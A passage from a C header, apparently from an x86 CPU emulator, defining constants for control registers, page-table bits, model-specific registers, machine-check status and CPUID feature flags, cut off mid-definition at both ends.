HF_CS64_SHIFT) #define HF_RF_MASK (1 << HF_RF_SHIFT) #define HF_VM_MASK (1 << HF_VM_SHIFT) #define HF_AC_MASK (1 << HF_AC_SHIFT) #define HF_SMM_MASK (1 << HF_SMM_SHIFT) #define HF_SVME_MASK (1 << HF_SVME_SHIFT) #define HF_GUEST_MASK (1 << HF_GUEST_SHIFT) #define HF_OSFXSR_MASK (1 << HF_OSFXSR_SHIFT) #define HF_SMAP_MASK (1 << HF_SMAP_SHIFT) #define HF_IOBPT_MASK (1 << HF_IOBPT_SHIFT) #define HF_MPX_EN_MASK (1 << HF_MPX_EN_SHIFT) #define HF_MPX_IU_MASK (1 << HF_MPX_IU_SHIFT) /* hflags2 */ #define HF2_GIF_SHIFT 0 /* if set CPU takes interrupts */ #define HF2_HIF_SHIFT 1 /* value of IF_MASK when entering SVM */ #define HF2_NMI_SHIFT 2 /* CPU serving NMI */ #define HF2_VINTR_SHIFT 3 /* value of V_INTR_MASKING bit */ #define HF2_SMM_INSIDE_NMI_SHIFT 4 /* CPU serving SMI nested inside NMI */ #define HF2_MPX_PR_SHIFT 5 /* BNDCFGx.BNDPRESERVE */ #define HF2_NPT_SHIFT 6 /* Nested Paging enabled */ #define HF2_IGNNE_SHIFT 7 /* Ignore CR0.NE=0 */ #define HF2_GIF_MASK (1 << HF2_GIF_SHIFT) #define HF2_HIF_MASK (1 << HF2_HIF_SHIFT) #define HF2_NMI_MASK (1 << HF2_NMI_SHIFT) #define HF2_VINTR_MASK (1 << HF2_VINTR_SHIFT) #define HF2_SMM_INSIDE_NMI_MASK (1 << HF2_SMM_INSIDE_NMI_SHIFT) #define HF2_MPX_PR_MASK (1 << HF2_MPX_PR_SHIFT) #define HF2_NPT_MASK (1 << HF2_NPT_SHIFT) #define HF2_IGNNE_MASK (1 << HF2_IGNNE_SHIFT) #define CR0_PE_SHIFT 0 #define CR0_MP_SHIFT 1 #define CR0_PE_MASK (1U << 0) #define CR0_MP_MASK (1U << 1) #define CR0_EM_MASK (1U << 2) #define CR0_TS_MASK (1U << 3) #define CR0_ET_MASK (1U << 4) #define CR0_NE_MASK (1U << 5) #define CR0_WP_MASK (1U << 16) #define CR0_AM_MASK (1U << 18) #define CR0_PG_MASK (1U << 31) #define CR4_VME_MASK (1U << 0) #define CR4_PVI_MASK (1U << 1) #define CR4_TSD_MASK (1U << 2) #define CR4_DE_MASK (1U << 3) #define CR4_PSE_MASK (1U << 4) #define CR4_PAE_MASK (1U << 5) #define CR4_MCE_MASK (1U << 6) #define CR4_PGE_MASK (1U << 7) #define CR4_PCE_MASK (1U << 8) #define CR4_OSFXSR_SHIFT 9 #define CR4_OSFXSR_MASK (1U << CR4_OSFXSR_SHIFT) #define CR4_OSXMMEXCPT_MASK (1U << 10) #define CR4_LA57_MASK (1U << 12) #define CR4_VMXE_MASK (1U << 13) #define CR4_SMXE_MASK (1U << 14) #define CR4_FSGSBASE_MASK (1U << 16) #define CR4_PCIDE_MASK (1U << 17) #define CR4_OSXSAVE_MASK (1U << 18) #define CR4_SMEP_MASK (1U << 20) #define CR4_SMAP_MASK (1U << 21) #define CR4_PKE_MASK (1U << 22) #define DR6_BD (1 << 13) #define DR6_BS (1 << 14) #define DR6_BT (1 << 15) #define DR6_FIXED_1 0xffff0ff0 #define DR7_GD (1 << 13) #define DR7_TYPE_SHIFT 16 #define DR7_LEN_SHIFT 18 #define DR7_FIXED_1 0x00000400 #define DR7_GLOBAL_BP_MASK 0xaa #define DR7_LOCAL_BP_MASK 0x55 #define DR7_MAX_BP 4 #define DR7_TYPE_BP_INST 0x0 #define DR7_TYPE_DATA_WR 0x1 #define DR7_TYPE_IO_RW 0x2 #define DR7_TYPE_DATA_RW 0x3 #define PG_PRESENT_BIT 0 #define PG_RW_BIT 1 #define PG_USER_BIT 2 #define PG_PWT_BIT 3 #define PG_PCD_BIT 4 #define PG_ACCESSED_BIT 5 #define PG_DIRTY_BIT 6 #define PG_PSE_BIT 7 #define PG_GLOBAL_BIT 8 #define PG_PSE_PAT_BIT 12 #define PG_PKRU_BIT 59 #define PG_NX_BIT 63 #define PG_PRESENT_MASK (1 << PG_PRESENT_BIT) #define PG_RW_MASK (1 << PG_RW_BIT) #define PG_USER_MASK (1 << PG_USER_BIT) #define PG_PWT_MASK (1 << PG_PWT_BIT) #define PG_PCD_MASK (1 << PG_PCD_BIT) #define PG_ACCESSED_MASK (1 << PG_ACCESSED_BIT) #define PG_DIRTY_MASK (1 << PG_DIRTY_BIT) #define PG_PSE_MASK (1 << PG_PSE_BIT) #define PG_GLOBAL_MASK (1 << PG_GLOBAL_BIT) #define PG_PSE_PAT_MASK (1 << PG_PSE_PAT_BIT) #define PG_ADDRESS_MASK 0x000ffffffffff000LL #define PG_HI_RSVD_MASK (PG_ADDRESS_MASK & ~PHYS_ADDR_MASK) #define PG_HI_USER_MASK 0x7ff0000000000000LL #define PG_PKRU_MASK (15ULL << PG_PKRU_BIT) #define PG_NX_MASK (1ULL << PG_NX_BIT) #define PG_ERROR_W_BIT 1 #define PG_ERROR_P_MASK 0x01 #define PG_ERROR_W_MASK (1 << PG_ERROR_W_BIT) #define PG_ERROR_U_MASK 0x04 #define PG_ERROR_RSVD_MASK 0x08 #define PG_ERROR_I_D_MASK 0x10 #define PG_ERROR_PK_MASK 0x20 #define MCG_CTL_P (1ULL<<8) /* MCG_CAP register available */ #define MCG_SER_P (1ULL<<24) /* MCA recovery/new status bits */ #define MCG_LMCE_P (1ULL<<27) /* Local Machine Check Supported */ #define MCE_CAP_DEF (MCG_CTL_P|MCG_SER_P) #define MCE_BANKS_DEF 10 #define MCG_CAP_BANKS_MASK 0xff #define MCG_STATUS_RIPV (1ULL<<0) /* restart ip valid */ #define MCG_STATUS_EIPV (1ULL<<1) /* ip points to correct instruction */ #define MCG_STATUS_MCIP (1ULL<<2) /* machine check in progress */ #define MCG_STATUS_LMCE (1ULL<<3) /* Local MCE signaled */ #define MCG_EXT_CTL_LMCE_EN (1ULL<<0) /* Local MCE enabled */ #define MCI_STATUS_VAL (1ULL<<63) /* valid error */ #define MCI_STATUS_OVER (1ULL<<62) /* previous errors lost */ #define MCI_STATUS_UC (1ULL<<61) /* uncorrected error */ #define MCI_STATUS_EN (1ULL<<60) /* error enabled */ #define MCI_STATUS_MISCV (1ULL<<59) /* misc error reg. valid */ #define MCI_STATUS_ADDRV (1ULL<<58) /* addr reg. valid */ #define MCI_STATUS_PCC (1ULL<<57) /* processor context corrupt */ #define MCI_STATUS_S (1ULL<<56) /* Signaled machine check */ #define MCI_STATUS_AR (1ULL<<55) /* Action required */ /* MISC register defines */ #define MCM_ADDR_SEGOFF 0 /* segment offset */ #define MCM_ADDR_LINEAR 1 /* linear address */ #define MCM_ADDR_PHYS 2 /* physical address */ #define MCM_ADDR_MEM 3 /* memory address */ #define MCM_ADDR_GENERIC 7 /* generic */ #define MSR_IA32_TSC 0x10 #define MSR_IA32_APICBASE 0x1b #define MSR_IA32_APICBASE_BSP (1<<8) #define MSR_IA32_APICBASE_ENABLE (1<<11) #define MSR_IA32_APICBASE_EXTD (1 << 10) #define MSR_IA32_APICBASE_BASE (0xfffffU<<12) #define MSR_IA32_FEATURE_CONTROL 0x0000003a #define MSR_TSC_ADJUST 0x0000003b #define MSR_IA32_SPEC_CTRL 0x48 #define MSR_VIRT_SSBD 0xc001011f #define MSR_IA32_PRED_CMD 0x49 #define MSR_IA32_UCODE_REV 0x8b #define MSR_IA32_CORE_CAPABILITY 0xcf #define MSR_IA32_ARCH_CAPABILITIES 0x10a #define ARCH_CAP_TSX_CTRL_MSR (1<<7) #define MSR_IA32_TSX_CTRL 0x122 #define MSR_IA32_TSCDEADLINE 0x6e0 #define FEATURE_CONTROL_LOCKED (1<<0) #define FEATURE_CONTROL_VMXON_ENABLED_OUTSIDE_SMX (1<<2) #define FEATURE_CONTROL_LMCE (1<<20) #define MSR_P6_PERFCTR0 0xc1 #define MSR_IA32_SMBASE 0x9e #define MSR_SMI_COUNT 0x34 #define MSR_MTRRcap 0xfe #define MSR_MTRRcap_VCNT 8 #define MSR_MTRRcap_FIXRANGE_SUPPORT (1 << 8) #define MSR_MTRRcap_WC_SUPPORTED (1 << 10) #define MSR_IA32_SYSENTER_CS 0x174 #define MSR_IA32_SYSENTER_ESP 0x175 #define MSR_IA32_SYSENTER_EIP 0x176 #define MSR_MCG_CAP 0x179 #define MSR_MCG_STATUS 0x17a #define MSR_MCG_CTL 0x17b #define MSR_MCG_EXT_CTL 0x4d0 #define MSR_P6_EVNTSEL0 0x186 #define MSR_IA32_PERF_STATUS 0x198 #define MSR_IA32_MISC_ENABLE 0x1a0 /* Indicates good rep/movs microcode on some processors: */ #define MSR_IA32_MISC_ENABLE_DEFAULT 1 #define MSR_IA32_MISC_ENABLE_MWAIT (1ULL << 18) #define MSR_MTRRphysBase(reg) (0x200 + 2 * (reg)) #define MSR_MTRRphysMask(reg) (0x200 + 2 * (reg) + 1) #define MSR_MTRRphysIndex(addr) ((((addr) & ~1u) - 0x200) / 2) #define MSR_MTRRfix64K_00000 0x250 #define MSR_MTRRfix16K_80000 0x258 #define MSR_MTRRfix16K_A0000 0x259 #define MSR_MTRRfix4K_C0000 0x268 #define MSR_MTRRfix4K_C8000 0x269 #define MSR_MTRRfix4K_D0000 0x26a #define MSR_MTRRfix4K_D8000 0x26b #define MSR_MTRRfix4K_E0000 0x26c #define MSR_MTRRfix4K_E8000 0x26d #define MSR_MTRRfix4K_F0000 0x26e #define MSR_MTRRfix4K_F8000 0x26f #define MSR_PAT 0x277 #define MSR_MTRRdefType 0x2ff #define MSR_CORE_PERF_FIXED_CTR0 0x309 #define MSR_CORE_PERF_FIXED_CTR1 0x30a #define MSR_CORE_PERF_FIXED_CTR2 0x30b #define MSR_CORE_PERF_FIXED_CTR_CTRL 0x38d #define MSR_CORE_PERF_GLOBAL_STATUS 0x38e #define MSR_CORE_PERF_GLOBAL_CTRL 0x38f #define MSR_CORE_PERF_GLOBAL_OVF_CTRL 0x390 #define MSR_MC0_CTL 0x400 #define MSR_MC0_STATUS 0x401 #define MSR_MC0_ADDR 0x402 #define MSR_MC0_MISC 0x403 #define MSR_IA32_RTIT_OUTPUT_BASE 0x560 #define MSR_IA32_RTIT_OUTPUT_MASK 0x561 #define MSR_IA32_RTIT_CTL 0x570 #define MSR_IA32_RTIT_STATUS 0x571 #define MSR_IA32_RTIT_CR3_MATCH 0x572 #define MSR_IA32_RTIT_ADDR0_A 0x580 #define MSR_IA32_RTIT_ADDR0_B 0x581 #define MSR_IA32_RTIT_ADDR1_A 0x582 #define MSR_IA32_RTIT_ADDR1_B 0x583 #define MSR_IA32_RTIT_ADDR2_A 0x584 #define MSR_IA32_RTIT_ADDR2_B 0x585 #define MSR_IA32_RTIT_ADDR3_A 0x586 #define MSR_IA32_RTIT_ADDR3_B 0x587 #define MAX_RTIT_ADDRS 8 #define MSR_EFER 0xc0000080 #define MSR_EFER_SCE (1 << 0) #define MSR_EFER_LME (1 << 8) #define MSR_EFER_LMA (1 << 10) #define MSR_EFER_NXE (1 << 11) #define MSR_EFER_SVME (1 << 12) #define MSR_EFER_FFXSR (1 << 14) #define MSR_STAR 0xc0000081 #define MSR_LSTAR 0xc0000082 #define MSR_CSTAR 0xc0000083 #define MSR_FMASK 0xc0000084 #define MSR_FSBASE 0xc0000100 #define MSR_GSBASE 0xc0000101 #define MSR_KERNELGSBASE 0xc0000102 #define MSR_TSC_AUX 0xc0000103 #define MSR_VM_HSAVE_PA 0xc0010117 #define MSR_IA32_BNDCFGS 0x00000d90 #define MSR_IA32_XSS 0x00000da0 #define MSR_IA32_UMWAIT_CONTROL 0xe1 #define MSR_IA32_VMX_BASIC 0x00000480 #define MSR_IA32_VMX_PINBASED_CTLS 0x00000481 #define MSR_IA32_VMX_PROCBASED_CTLS 0x00000482 #define MSR_IA32_VMX_EXIT_CTLS 0x00000483 #define MSR_IA32_VMX_ENTRY_CTLS 0x00000484 #define MSR_IA32_VMX_MISC 0x00000485 #define MSR_IA32_VMX_CR0_FIXED0 0x00000486 #define MSR_IA32_VMX_CR0_FIXED1 0x00000487 #define MSR_IA32_VMX_CR4_FIXED0 0x00000488 #define MSR_IA32_VMX_CR4_FIXED1 0x00000489 #define MSR_IA32_VMX_VMCS_ENUM 0x0000048a #define MSR_IA32_VMX_PROCBASED_CTLS2 0x0000048b #define MSR_IA32_VMX_EPT_VPID_CAP 0x0000048c #define MSR_IA32_VMX_TRUE_PINBASED_CTLS 0x0000048d #define MSR_IA32_VMX_TRUE_PROCBASED_CTLS 0x0000048e #define MSR_IA32_VMX_TRUE_EXIT_CTLS 0x0000048f #define MSR_IA32_VMX_TRUE_ENTRY_CTLS 0x00000490 #define MSR_IA32_VMX_VMFUNC 0x00000491 #define XSTATE_FP_BIT 0 #define XSTATE_SSE_BIT 1 #define XSTATE_YMM_BIT 2 #define XSTATE_BNDREGS_BIT 3 #define XSTATE_BNDCSR_BIT 4 #define XSTATE_OPMASK_BIT 5 #define XSTATE_ZMM_Hi256_BIT 6 #define XSTATE_Hi16_ZMM_BIT 7 #define XSTATE_PKRU_BIT 9 #define XSTATE_FP_MASK (1ULL << XSTATE_FP_BIT) #define XSTATE_SSE_MASK (1ULL << XSTATE_SSE_BIT) #define XSTATE_YMM_MASK (1ULL << XSTATE_YMM_BIT) #define XSTATE_BNDREGS_MASK (1ULL << XSTATE_BNDREGS_BIT) #define XSTATE_BNDCSR_MASK (1ULL << XSTATE_BNDCSR_BIT) #define XSTATE_OPMASK_MASK (1ULL << XSTATE_OPMASK_BIT) #define XSTATE_ZMM_Hi256_MASK (1ULL << XSTATE_ZMM_Hi256_BIT) #define XSTATE_Hi16_ZMM_MASK (1ULL << XSTATE_Hi16_ZMM_BIT) #define XSTATE_PKRU_MASK (1ULL << XSTATE_PKRU_BIT) /* CPUID feature words */ typedef enum FeatureWord { FEAT_1_EDX, /* CPUID[1].EDX */ FEAT_1_ECX, /* CPUID[1].ECX */ FEAT_7_0_EBX, /* CPUID[EAX=7,ECX=0].EBX */ FEAT_7_0_ECX, /* CPUID[EAX=7,ECX=0].ECX */ FEAT_7_0_EDX, /* CPUID[EAX=7,ECX=0].EDX */ FEAT_7_1_EAX, /* CPUID[EAX=7,ECX=1].EAX */ FEAT_8000_0001_EDX, /* CPUID[8000_0001].EDX */ FEAT_8000_0001_ECX, /* CPUID[8000_0001].ECX */ FEAT_8000_0007_EDX, /* CPUID[8000_0007].EDX */ FEAT_8000_0008_EBX, /* CPUID[8000_0008].EBX */ FEAT_C000_0001_EDX, /* CPUID[C000_0001].EDX */ FEAT_KVM, /* CPUID[4000_0001].EAX (KVM_CPUID_FEATURES) */ FEAT_KVM_HINTS, /* CPUID[4000_0001].EDX */ FEAT_HYPERV_EAX, /* CPUID[4000_0003].EAX */ FEAT_HYPERV_EBX, /* CPUID[4000_0003].EBX */ FEAT_HYPERV_EDX, /* CPUID[4000_0003].EDX */ FEAT_HV_RECOMM_EAX, /* CPUID[4000_0004].EAX */ FEAT_HV_NESTED_EAX, /* CPUID[4000_000A].EAX */ FEAT_SVM, /* CPUID[8000_000A].EDX */ FEAT_XSAVE, /* CPUID[EAX=0xd,ECX=1].EAX */ FEAT_6_EAX, /* CPUID[6].EAX */ FEAT_XSAVE_COMP_LO, /* CPUID[EAX=0xd,ECX=0].EAX */ FEAT_XSAVE_COMP_HI, /* CPUID[EAX=0xd,ECX=0].EDX */ FEAT_ARCH_CAPABILITIES, FEAT_CORE_CAPABILITY, FEAT_VMX_PROCBASED_CTLS, FEAT_VMX_SECONDARY_CTLS, FEAT_VMX_PINBASED_CTLS, FEAT_VMX_EXIT_CTLS, FEAT_VMX_ENTRY_CTLS, FEAT_VMX_MISC, FEAT_VMX_EPT_VPID_CAPS, FEAT_VMX_BASIC, FEAT_VMX_VMFUNC, FEATURE_WORDS, } FeatureWord; typedef uint64_t FeatureWordArray[FEATURE_WORDS]; /* cpuid_features bits */ #define CPUID_FP87 (1U << 0) #define CPUID_VME (1U << 1) #define CPUID_DE (1U << 2) #define CPUID_PSE (1U << 3) #define CPUID_TSC (1U << 4) #define CPUID_MSR (1U << 5) #define CPUID_PAE (1U << 6) #define CPUID_MCE (1U << 7) #define CPUID_CX8 (1U << 8) #define CPUID_APIC (1U << 9) #define CPUID_SEP (1U << 11) /* sysenter/sysexit */ #define CPUID_MTRR (1U << 12) #define CPUID_PGE (1U << 13) #define CPUID_MCA (1U << 14) #define CPUID_CMOV (1U << 15) #define CPUID_PAT (1U << 16) #define CPUID_PSE36 (1U << 17) #define CPUID_PN (1U << 18) #define CPUID_CLFLUSH (1U << 19) #define CPUID_DTS (1U << 21) #define CPUID_ACPI (1U << 22) #define CPUID_MMX (1U << 23) #define CPUID_FXSR (1U << 24) #define CPUID_SSE (1U << 25) #define CPUID_SSE2 (1U << 26) #define CPUID_SS (1U << 27) #define CPUID_HT (1U << 28) #define CPUID_TM (1U << 29) #define CPUID_IA64 (1U << 30) #define CPUID_PBE (1U << 31) #define CPUID_EXT_SSE3 (1U << 0) #define CPUID_EXT_PCLMULQDQ (1U << 1) #define CPUID_EXT_DTES64 (1U << 2) #define CPUID_EXT_MONITOR (1U << 3) #define CPUID_EXT_DSCPL (1U << 4) #define CPUID_EXT_VMX (1U << 5) #define CPUID_EXT_SMX (1U << 6) #define CPUID_EXT_EST (1U << 7) #define CPUID_EXT_TM2 (1U << 8) #define CPUID_EXT_SSSE3 (1U << 9) #define CPUID_EXT_CID (1U << 10) #define CPUID_EXT_FMA (1U << 12) #define CPUID_EXT_CX16 (1U << 13) #define CPUID_EXT_XTPR (1U << 14) #define CPUID_EXT_PDCM (1U << 15) #define CPUID_EXT_PCID (1U << 17) #define CPUID_EXT_DCA (1U << 18) #define CPUID_EXT_SSE41 (1U << 19) #define CPUID_EXT_SSE42 (1U << 20) #define CPUID_EXT_X2APIC (1U << 21) #define CPUID_EXT_MOVBE (1U << 22) #define CPUID_EXT_POPCNT (1U << 23) #define CPUID_EXT_TSC_DEADLINE_TIMER (1U << 24) #define CPUID_EXT_AES (1U << 25) #define CPUID_EXT_XSAVE (1U << 26) #define CPUID_EXT_OSXSAVE (1U << 27) #define CPUID_EXT_AVX (1U << 28) #define CPUID_EXT_F16C (1U << 29) #define CPUID_EXT_RDRAND (1U << 30) #define CPUID_EXT_HYPERVISOR (1U << 31) #define CPUID_EXT2_FPU (1U << 0) #define CPUID_EXT2_VME (1U << 1) #define CPUID_EXT2_DE (1U << 2) #define CPUID_EXT2_PSE (1U << 3) #define CPUID_EXT2_TSC (1U << 4) #define CPUID_EXT2_MSR (1U << 5) #define CPUID_EXT2_PAE (1U << 6) #define CPUID_EXT2_MCE (1U << 7) #define CPUID_EXT2_CX8 (1U << 8) #define CPUID_EXT2_APIC (1U << 9) #define CPUID_EXT2_SYSCALL (1U << 11) #define CPUID_EXT2_MTRR (1U << 12) #define CPUID_EXT2_PGE (1U << 13) #define CPUID_EXT2_MCA (1U << 14) #define CPUID_EXT2_CMOV (1U << 15) #define CPUID_EXT2_PAT (1U << 16) #define CPUID_EXT2_PSE36 (1U << 17) #define CPUID_EXT2_MP (1U << 19) #define CPUID_EXT2_NX (1U << 20) #define CPUID_EXT2_MMXEXT (1U << 22) #define CPUID_EXT2_MMX (1U << 23) #define CPUID_EXT2_FXSR (1U << 24) #define CPUID_EXT2_FFXSR (1U << 25) #define CPUID_EXT2_PDPE1GB (1U << 26) #define CPUID_EXT2_RDTSCP (1U << 27) #define CPUID_EXT2_LM (1U << 29) #define CPUID_EXT2_3DNOWEXT (1U << 30) #define CPUID_EXT2_3DNOW (1U << 31) /* CPUID[8000_0001].EDX bits that are aliase of CPUID[1].EDX bits on AMD CPUs */ #define CPUID_EXT2_AMD_ALIASES (CPUID_EXT2_FPU | CPUID_EXT2_VME | \ CPUID_EXT2_DE | CPUID_EXT2_PSE | \ CPUID_EXT2_TSC | CPUID_EXT2_MSR | \ CPUID_EXT2_PAE | CPUID_EXT2_MCE | \ CPUID_EXT2_CX8 | CPUID_EXT2_APIC | \ CPUID_EXT2_MTRR | CPUID_EXT2_PGE | \ CPUID_EXT2_MCA | CPUID_EXT2_CMOV | \ CPUID_EXT2_PAT | CPUID_EXT2_PSE36 | \ CPUID_EXT2_MMX | CPUID_EXT2_FXSR) #define CPUID_EXT3_LAHF_LM (1U << 0) #define CPUID_EXT3_CMP_LEG (1U << 1) #define CPUID_EXT3_SVM (1U << 2) #define CPUID_EXT3_EXTAPIC (1U << 3) #define CPUID_EXT3_CR8LEG (1U << 4) #define CPUID_EXT3_ABM (1U << 5) #define CPUID_EXT3_SSE4A (1U << 6) #define CPUID_EXT3_MISALIGNSSE (1U << 7) #define CPUID_EXT3_3DNOWPREFETCH (1U << 8) #define CPUID_EXT3_OSVW (1U << 9) #define CPUID_EXT3_IBS (1U << 10) #define CPUID_EXT3_XOP (1U << 11) #define CPUID_EXT3_SKINIT (1U << 12) #define CPUID_EXT3_WDT (1U << 13) #define CPUID_EXT3_LWP (1U << 15) #define CPUID_EXT3_FMA4 (1U << 16) #define CPUID_EXT3_TCE (1U << 17) #define CPUID_EXT3_NODEID (1U << 19) #define CPUID_EXT3_TBM (1U << 21) #define CPUID_EXT3_TOPOEXT (1U << 22) #define CPUID_EXT3_PERFCORE (1U << 23) #define CPUID_EXT3_PERFNB (1U << 24) #define CPUID_SVM_NPT (1U << 0) #define CPUID_SVM_LBRV (1U << 1) #define CPUID_SVM_SVMLOCK (1U << 2) #define CPUID_SVM_NRIPSAVE (1U << 3) #define CPUID_SVM_TSCSCALE (1U << 4) #define CPUID_SVM_VMCBCLEAN (1U << 5) #define CPUID_SVM_FLUSHASID (1U << 6) #define CPUID_SVM_DECODEASSIST (1U << 7) #define CPUID_SVM_PAUSEFILTER (1U << 10) #define CPUID_SVM_PFTHRESHOLD (1U << 12) /* Support RDFSBASE/RDGSBASE/WRFSBASE/WRGSBASE */ #define CPUID_7_0_EBX_FSGSBASE (1U << 0) /* 1st Group of Advanced Bit Manipulation Extensions */ #define CPUID_7_0_EBX_BMI1 (1U << 3) /* Hardware Lock Elision */ #define CPUID_7_0_EBX_HLE (1U << 4) /* Intel Advanced Vector Extensions 2 */ #define CPUID_7_0_EBX_AVX2 (1U << 5) /* Supervisor-mode Execution Prevention */ #define CPUID_7_0_EBX_SMEP (1U << 7) /* 2nd Group of Advanced Bit Manipulation Extensions */ #define CPUID_7_0_EBX_BMI2 (1U << 8) /* Enhanced REP MOVSB/STOSB */ #define CPUID_7_0_EBX_ERMS (1U << 9) /* Invalidate Process-Context Identifier */ #define CPUID_7_0_EBX_INVPCID (1U << 10) /* Restricted Transactional Memory */ #define CPUID_7_0_EBX_RTM (1U << 11) /* Memory Protection Extension */ #define CPUID_7_0_EBX_MPX (1U << 14) /* AVX-512 Foundation */ #define CPUID_7_0_EBX_AVX512F (1U << 16) /* AVX-512 Doubleword & Quadword Instruction */ #define CPUID_7_0_EBX_AVX512DQ (1U << 17) /* Read Random SEED */ #define CPUID_7_0_EBX_RDSEED (1U << 18) /* ADCX and ADOX instructions */ #define CPUID_7_0_EBX_ADX (1U << 19) /* Supervisor Mode Access Prevention */ #define CPUID_7_0_EBX_SMAP (1U << 20) /* AVX-512 Integer Fused Multiply Add */ #define CPUID_7_0_EBX_AVX512IFMA (1U << 21) /* Persistent Commit */ #define CPUID_7_0_EBX_PCOMMIT (1U << 22) /* Flush a Cache Line Optimized */ #define CPUID_7_0_EBX_CLFLUSHOPT (1U << 23) /* Cache Line Write Back */ #define CPUID_7_0_EBX_CLWB (1U << 24) /* Intel Processor Trace */ #define CPUID_7_0_EBX_INTEL_PT (1U << 25) /* AVX-512 Prefetch */ #define CPUID_7_0_EBX_AVX512PF (1U << 26) /* AVX-512 Exponential and Reciprocal */ #define CPUID_7_0_EBX_AVX512ER (1U << 27) /* AVX-512 Conflict Detection */ #define CPUID_7_0_EBX_AVX512CD (1U << 28) /* SHA1/SHA256 Instruction Extensions */ #define CPUID_7_0_EBX_SHA_NI (1U << 29) /* AVX-512 Byte and Word Instructions */ #define CPUID_7_0_EBX_AVX512BW (1U << 30) /* AVX-512 Vector Length Extensions */ #define CPUID_7_0_EBX_AVX512VL (1U << 31) /* AVX-512 Vector Byte Manipulation Instruction */ #define CPUID_7_0_ECX_AVX512_VBMI (1U << 1) /* User-Mode Instruction Prevention */ #define CPUID_7_0_ECX_UMIP (1U << 2) /* Protection Keys for User-mode Pages */ #define CPUID_7_0_ECX_PKU (1U << 3) /* OS Enable Protection Keys */ #define CPUID_7_0_ECX_OSPKE (1U << 4) /* UMONITOR/UMWAIT/TPAUSE Instructions */ #define CPUID_7_0_ECX_WAITPKG (1U << 5) /* Additional AVX-512 Vector Byte Manipulation Instruction */ #define CPUID_7_0_ECX_AVX512_VBMI2 (1U << 6) /* Galois Field New Instructions */ #define CPUID_7_0_ECX_GFNI (1U << 8) /* Vector AES Instructions */ #define CPUID_7_0_ECX_VAES (1U << 9) /* Carry-Less Multiplication Quadword */ #define CPUID_7_0_ECX_VPCLMULQDQ (1U << 10) /* Vector Neural Network Instructions */ #define CPUID_7_0_ECX_AVX512VNNI (1U << 11) /* Support for VPOPCNT[B,W] and VPSHUFBITQMB */ #define CPUID_7_0_ECX_AVX512BITALG (1U << 12) /* POPCNT for vectors of DW/QW */ #define CPUID_7_0_ECX_AVX512_VPOPCNTDQ (1U << 14) /* 5-level Page Tables */ #define CPUID_7_0_ECX_LA57 (1U << 16) /* Read Processor ID */ #define CPUID_7_0_ECX_RDPID (1U << 22) /* Cache Line Demote Instruction */ #define CPUID_7_0_ECX_CLDEMOTE (1U << 25) /* Move Doubleword as Direct Store Instruction */ #define CPUID_7_0_ECX_MOVDIRI (1U << 27) /* Move 64 Bytes as Direct Store Instruction */ #define CPUID_7_0_ECX_MOVDIR64B (1U << 28) /* AVX512 Neural Network Instructions */ #define CPUID_7_0_EDX_AVX512_4VNNIW (1U << 2) /* AVX512 Multiply Accumulation Single Precision */ #define CPUID_7_0_EDX_AVX512_4FMAPS (1U << 3) /* Speculation Control */ #define CPUID_7_0_EDX_SPEC_CTRL (1U << 26) /* Single Thread Indirect Branch Predictors */ #define CPUID_7_0_EDX_STIBP (1U << 27) /* Arch Capabilities */ #define CPUID_7_0_EDX_ARCH_CAPABILITIES (1U << 29) /* Core Capability */ #define CPUID_7_0_EDX_CORE_CAPABILITY (1U << 30) /* Speculative Store Bypass Disable */ #define CPUID_7_0_EDX_SPEC_CTRL_SSBD (1U << 31) /* AVX512 BFloat16 Instruction */ #define CPUID_7_1_EAX_AVX512_BF16 (1U << 5) /* CLZERO instruction */ #define CPUID_8000_0008_EBX_CLZERO (1U << 0) /* Always save/restore FP error pointers */ #define CPUID_8000_0008_EBX_XSAVEERPTR (1U << 2) /* Write back and do not invalidate cache */ #define CPUID_8000_0008_EBX_WBNOINVD (1U << 9) /* Indirect Branch Prediction Barrier */ #define CPUID_8000_0008_EBX_IBPB (1U << 12) /* Single Thread Indirect Branch Predictors */ #define CPUID_8000_0008_EBX_STIBP (1U << 15) #define CPUID_XSAVE_XSAVEOPT (1U << 0) #define CPUID_XSAVE_XSAVEC (1U << 1) #define CPUID_XSAVE_XGETBV1 (1U << 2) #define CPUID_XSAVE_XSAVES (1U << 3) #define CPUID_6_EAX_ARAT (1U << 2) /* CPUID[0x80000007].EDX flags: */ #define CPUID_APM_INVTSC (1U << 8) #define CPUID_VENDOR_SZ 12 #define CPUID_VENDOR_INTEL_1 0x756e6547 /* "Genu" */ #define CPUID_VENDOR_INTEL_2 0x49656e69 /* "ineI" */ #define CPUID_VENDOR_INTEL_3 0x6c65746e /* "ntel" */ #define CPUID_VENDOR_INTEL "GenuineIntel" #define CPUID_VENDOR_AMD_1 0x68747541 /* "Auth" */ #define CPUID_VENDOR_AMD_2 0x69746e65 /* "enti" */ #define CPUID_VENDOR_AMD_3 0x444d4163 /* "cAMD" */ #define CPUID_VENDOR_AMD "AuthenticAMD" #define CPUID_VENDOR_VIA "CentaurHauls" #define CPUID_VENDOR_HYGON "HygonGenuine" #define IS_INTEL_CPU(env) ((env)->cpuid_vendor1 == CPUID_VENDOR_INTEL_1 && \ (env)->cpuid_vendor2 == CPUID_VENDOR_INTEL_2 && \ (env)->cpuid_vendor3 == CPUID_VENDOR_INTEL_3) #define IS_AMD_CPU(env) ((env)->cpuid_vendor1 == CPUID_VENDOR_AMD_1 && \ (env)->cpuid_vendor2 == CPUID_VENDOR_AMD_2 && \ (env)->cpuid_vendor3 == CPUID_VENDOR_AMD_3) #define CPUID_MWAIT_IBE (1U << 1) /* Interrupts can exit capability */ #define CPUID_MWAIT_EMX (1U << 0) /* enumeration supported */ /* CPUID[0xB].ECX level types */ #define CPUID_TOPOLOGY_LEVEL_INVALID (0U << 8) #define CPUID_TOPOLOGY_LEVEL_SMT (1U << 8) #define CPUID_TOPOLOGY_LEVEL_CORE (2U << 8) #define CPUID_TOPOLOGY_LEVEL_DIE (5U << 8) /* MSR Feature Bits */ #define MSR_ARCH_CAP_RDCL_NO (1U << 0) #define MSR_ARCH_CAP_IBRS_ALL (1U << 1) #define MSR_ARCH_CAP_RSBA (1U << 2) #define MSR_ARCH_CAP_SKIP_L1DFL_VMENTRY (1U << 3) #define MSR_ARCH_CAP_SSB_NO (1U << 4) #define MSR_ARCH_CAP_MDS_NO (1U << 5) #define MSR_ARCH_CAP_PSCHANGE_MC_NO (1U << 6) #define MSR_ARCH_CAP_TSX_CTRL_MSR (1U << 7) #define MSR_ARCH_CAP_TAA_NO (1U << 8) #define MSR_CORE_CAP_SPLIT_LOCK_DETECT (1U << 5) /* VMX MSR features */ #define MSR_VMX_BASIC_VMCS_REVISION_MASK 